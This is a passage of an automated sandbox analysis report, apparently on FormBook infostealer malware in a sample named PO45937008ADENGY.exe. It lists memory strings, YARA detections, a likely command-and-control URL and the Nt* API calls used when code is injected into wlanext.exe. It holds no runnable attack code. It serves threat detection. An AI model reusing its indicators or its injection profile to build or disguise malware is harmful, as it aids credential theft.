          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://scripts.webcontentassessor.com/scripts/5550ca64f1c03fa16b2d1f2d6508b85a6de49bc25b57292ba9c7c
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
          Source: wlanext.exe, 00000011.00000002.915820348.0000000003FB2000.00000004.00000001.sdmpString found in binary or memory: https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJI
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.c
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-user
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-user-jurgen-klopp-19941053
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0136A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01369650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0396AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03969560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE82F0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE8270 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE82EA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE826B NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EE81BC NtCreateFile,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 0_2_015B8E10
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00401030
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041CAB3
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00408C60
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041BC8F
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00402D90
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0041B758
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_00402FB0
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01344120
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132F900
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013FE824
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1002
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013520A0
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F20A8
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133B090
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F28EC
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F2B28
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135EBB0
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EDBD2
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F22AE
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01320D20
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F2D07
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F1D55
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133D5E0
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F25DD
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133841F
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013ED466
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F1FF1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013FDFCE
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01346E30
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013ED616
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0395EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039EDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0392F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03944120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039520A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039E1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03946E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03952581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_03920D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039F1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_0393841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_039ED466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EECAB3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02ED2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEB758
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02EEBC8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02ED8C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 17_2_02ED2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0392B150 appears 35 times
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: String function: 0132B150 appears 35 times
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.719959307.00000000052A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmpBinary or memory string: originalfilename vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.725096915.0000000006460000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.708791475.0000000000ACE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.724929316.0000000006210000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
